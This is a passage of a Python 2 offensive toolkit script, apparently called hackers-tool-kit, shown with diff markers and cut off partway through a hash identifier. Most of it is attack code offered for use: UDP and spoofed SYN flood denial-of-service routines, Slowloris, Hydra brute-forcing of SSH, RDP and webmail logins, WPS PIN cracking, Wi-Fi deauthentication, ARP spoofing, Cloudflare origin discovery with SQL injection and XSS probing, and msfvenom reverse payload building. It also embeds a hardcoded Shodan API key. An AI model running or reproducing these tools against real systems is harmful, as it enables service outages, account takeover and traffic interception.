domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and 